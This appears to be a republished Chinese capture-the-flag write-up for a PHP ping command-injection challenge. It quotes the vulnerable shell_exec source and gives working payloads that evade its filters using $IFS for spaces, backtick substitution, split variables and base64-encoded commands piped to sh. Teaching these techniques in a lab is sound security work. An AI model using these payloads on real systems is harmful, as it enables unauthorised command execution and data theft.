当前位置: 首页 > news >正文

基于互联网 模式下的安全网站建设网站开发jsp 很少

基于互联网 模式下的安全网站建设,网站开发jsp 很少,广西建设人才网,安徽中机诚建建设有限公司网站知识点: 命令执行 linux空格绕过 反引号绕过 变量绕过 base64编码绕过 打开页面提示 "听说php可以执行系统函数?我来康康" 然后输入框内提示输入 bjut.edu.cn 输入之后回显信息,是ping 这个网址的信息 输入127.0.0.1 因为提示是命令…

知识点:

命令执行

linux空格绕过

反引号绕过       变量绕过          base64编码绕过

打开页面提示 "听说php可以执行系统函数?我来康康"

然后输入框内提示输入 bjut.edu.cn   输入之后回显信息,是ping 这个网址的信息

 

输入127.0.0.1

因为提示是命令执行,并且会执行ping操作,用;分隔命令,输入 

bjut.edu.cn;ls

发现回显了两个文件flag.php 和 index.php 也说明是linux环境,查看一下flag.php文件


输入bjut.edu.cn;cat flag.php 报错fxck your space!

说明是过滤了空格
#${IFS}  $IFS$1  %09  %20  ${IFS  <重定向符号 有时候都可以替代空格 就看题目过滤了什么符号


尝试之后发现$IFS$1可以  最后的1可以是其他数字,效果是一样的

bjut.edu.cn;cat$IFS$1flag.php

回显fxck your flag! flag也被过滤了
那就查看一下index.php文件,发现里面是源代码

if(isset($_GET['ip'])){$ip = $_GET['ip'];if(preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{1f}]|\|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){print_r($match);print($ip);echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);die("fxck your symbol!");}else if(preg_match("/ /", $ip)){die("fxck your space!");}else if(preg_match("/bash/", $ip)){die("fxck your bash!");}else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){#检查字符串中是否分别含有 'f', 'l', 'a', 'g' 这四个字母,无论这四个字母之间有多少或什么其他的字符,而且它们出现的顺序与 "flag" 字符串中的顺序相同die("fxck your flag!");}$a = shell_exec("ping -c 4 ".$ip);echo "";print_r($a);}

方法一: 反引号绕过

其中过滤了很多符号,但是没有过滤反引号``

使用反引号绕过   bjut.edu.cn;cat$IFS$1`ls` (先执行``里面的代码,绕过输入flag的限制)

然后f12查看源码得到被注释的flag

方法二:变量绕过

例如a=l;b=s;$a$b  就会执行ls
输入框输入   127.0.0.1;x=f;cat$IFS$1$xlag.php 
这种情况会显示fuck flag,即被过滤,因为整个字符串参数ip中 f l a g 顺序出现

127.0.0.1;x=l;cat$IFS$1f$xag.php    没被过滤,但是不回显flag
127.0.0.1;x=a;cat$IFS$1fl$xg.php    也是一样不回显flag
127.0.0.1;x=g;cat$IFS$1fla$x.php    查看源码得到flag
127.0.0.1;x=ag;cat$IFS$1fl$x.php    查看源码也可以得到flag
127.0.0.1;x=lag;cat$IFS$1f$x.php    查看源码也可以得到flag


这里我的理解是f$xag.php  和 fl$xg.php 不回显flag 是因为把原本的参数$x 当成了$xag 和  $xg
所以要把参数放在最后才会识别为$x

方法三:base64编码绕过

这里还可以将cat flag.php进行base64编码
得到Y2F0IGZsYWcucGhw       再用base64-d命令来执行
虽然过滤了bash但大部分命令仍然可以用sh来代替执行

127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh

使用 echo命令使得cat flag.php的base64编码被正确地作为输入参数传递给 base64 -d

即前面的  echo$IFS$1Y2F0IGZsYWcucGhw  作为管道符的输入




同样可以使用反引号``配合base64编码绕过,这样不需要使用sh

127.0.0.1;`echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d`

http://www.yayakq.cn/news/174392/

相关文章:

  • 网站内容是怎么吸引用户的wordpress 三一重工
  • 做设计转钱网站郑州网络营销公司排名
  • 设计素材类网站开发策划书做网站用什么平台
  • 建设网站哪家公司好ps制作网页效果图教程
  • 微网站下载资料怎么做简答题网络营销是什么
  • 南靖网站建设Wordpress页面无侧边栏
  • 网站国际网络备案号物流公司做网站注重什么问题
  • 宁波品牌网站建设服务电话网站自适应手机转码
  • vps装网站管理系统iis默认网站 没有属性
  • 经验分享的网站开发上海华东民航机场建设公司网站
  • 建网站卖饮料做网站的如何说服客户
  • 光谷网站建设哪家好如何在vps上建设网站
  • 做网站嘉兴3d效果图制作教程
  • 建设银行的官方网站高铁纪念币页面设计收获心得
  • 自己做网站用什么软件下载学生免费舆情监测平台官网
  • 建设部网站官网证书查询新余网站网站建设
  • 上海优秀网站设计专业的建网站的公司
  • 丰润网站建设外贸网站如何做seo
  • 六一儿童节网站制作百度站长网站文件验证
  • 广元建设公司网站wordpress+怎么改密码忘记
  • 出格做网站如何建设视频资源电影网站
  • 自建网站系统东莞做微网站建设价格
  • 艺术家网站建设中企业网站建设的策划初期的一些误区中山精品网站建设信息
  • 韩国网站效果好的网站制作公司
  • 南宁优化网站收费自己制作网站的方法是
  • 桂林网站制作网站石家庄新闻最新
  • 团购网站做不起来个人网站备案转企业备案
  • 南昌优化网站排名wordpress在线升级
  • 做设计有必要买素材网站会员吗wordpress variant
  • 网站建设合同以及服务条款盐城做网站的价格